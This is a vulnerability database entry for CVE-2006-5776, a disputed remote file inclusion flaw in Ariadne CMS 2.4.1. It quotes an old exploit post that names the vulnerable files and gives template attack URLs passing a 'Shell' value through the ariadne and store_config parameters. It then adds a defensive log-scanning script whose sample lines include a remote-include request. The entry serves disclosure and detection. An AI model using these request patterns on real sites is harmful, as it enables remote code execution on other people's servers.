Ariadne CMS Multiple Remote File Inclusion Vulnerabilities

Vulnerability ID: 1192955    Vulnerability type: Input validation
Published: 2006-11-06    Updated: 2006-11-09
CVE ID: CVE-2006-5776    CNNVD-ID: CNNVD-200611-101
Affected platform: N/A    CVSS score: 7.5
|Vulnerability source
https://cxsecurity.com/issue/WLB-2006110030
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200611-101
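|Vulnerability details
**DISPUTED** Multiple PHP remote file inclusion vulnerabilities in Ariadne 2.4.1 allow remote attackers to execute arbitrary PHP code via the ariadne parameter in (1) ftp/loader.php and (2) lib/includes/loader.cmd.php. NOTE: CVE disputes this issue, because the installation instructions recommend placing these files outside the web document root and require the administrator to modify $ariadne in an include file.
|Exploit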
*******************************************************************************
# Title  :  Ariadne  <= 2.4.1 Multiple Remote File Include Vulnerabilities

# Author :   ajann

# Script Page :   http://www.ariadne-cms.org/en/download/

# Vuln;

*******************************************************************************
[Files]
loader.php
loader.cmd.php
[/Files]

[Code,1]
loader.php Error:

..
....
require($ariadne."/configs/ariadne.phtml");
    require($ariadne."/configs/ftp/$configfile");
	require($ariadne."/configs/store.phtml");
	require($ariadne."/includes/loader.ftp.php");
	require($ariadne."/configs/sessions.phtml");
	require($ariadne."/stores/".$store_config["dbms"]."store.phtml");
	require($ariadne."/nls/en");
	require($ariadne."/modules/mod_mimemagic.php");
	
	require($ariadne."/modules/mod_virusscan.php");
....
..

Key [:] ariadne=[file]
Key [:] store_config[code]=[file]

Example:

http://target.com/path/ftp/loader.php?ariadne=Shell
http://target.com/path/lib/includes/loader.cmd.php?store_config[code]=Shell
....

# ajann,Turkey
# ...
# I'm not a hacker!
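
A defender-side check for the requests described in this entry, as an added example that is not part of the original advisory or of Ariadne's code: it scans web access log lines for requests to the two loader scripts that carry the `ariadne` or `store_config[...]` parameters. The log lines are constructed samples in an Apache-style format, and the function names are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script paths and parameter names are the ones named in this entry.
LOADER_PATHS = ("/ftp/loader.php", "/lib/includes/loader.cmd.php")
PARAM_RE = re.compile(r"^(ariadne|store_config)(\[|$)", re.I)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A value starting with "scheme:" points the include at a URL or stream wrapper.
SCHEME_RE = re.compile(r"^[a-z][a-z0-9+.\-]*:", re.I)

def inspect_line(line):
    """Return a finding dict for a request that sets the include base, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith(LOADER_PATHS):
        return None
    # parse_qsl percent-decodes, so store_config%5Bcode%5D is matched too.
    hits = [(k, v) for k, v in parse_qsl(url.query, keep_blank_values=True)
            if PARAM_RE.match(k)]
    if not hits:
        return None
    return {
        "client": line.split(" ", 1)[0],
        "path": url.path,
        "params": [k for k, _ in hits],
        "remote_value": any(SCHEME_RE.match(v) for _, v in hits),
    }

def scan(lines):
    """Inspect every line and keep only the findings."""
    return [f for f in map(inspect_line, lines) if f]

# Constructed sample lines (hypothetical hosts and paths), query strings only:
# parameters sent in a POST body do not appear in an access log.
SAMPLE_LOG = [
    '192.0.2.10 - - [06/Nov/2006:10:00:00 +0000] "GET /index.php HTTP/1.1" 200 512',
    '192.0.2.44 - - [06/Nov/2006:10:01:00 +0000] "GET /cms/ftp/loader.php?ariadne=http%3A%2F%2Fexample.invalid%2Fx HTTP/1.1" 200 0',
    '192.0.2.45 - - [06/Nov/2006:10:02:00 +0000] "GET /cms/lib/includes/loader.cmd.php?store_config%5Bcode%5D=local HTTP/1.1" 200 0',
    '192.0.2.11 - - [06/Nov/2006:10:03:00 +0000] "GET /cms/ftp/loader.php HTTP/1.1" 200 0',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit on either script also shows that the file is reachable under the web document root, which the installation instructions cited in the dispute advise against.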
|References

Source: XF
Name: ariadne-storeconfig-file-include(30018)
Link: http://xforce.iss.net/xforce/xfdb/30018
Source: BID
Name: 20916
Link: http://www.securityfocus.com/bid/20916
Source: BUGTRAQ
Name: 20061106 Ariadne <= 2.4.1 Multiple Remote File Include Vulnerabilities (New)
Link: http://www.securityfocus.com/archive/1/archive/1/450709/100/0/threaded
Source: VIM
Name: 20061106 RE: DISPUTE: PHP file inclusion in Ariadne 2.4.1
Link: http://attrition.org/pipermail/vim/2006-November/001109.html
Source: VIM
Name: 20061106 DISPUTE: PHP file inclusion in Ariadne 2.4.1
Link: http://attrition.org/pipermail/vim/2006-November/001108.html
Source: SREASON
Name: 1827
Link: http://securityreason.com/securityalert/1827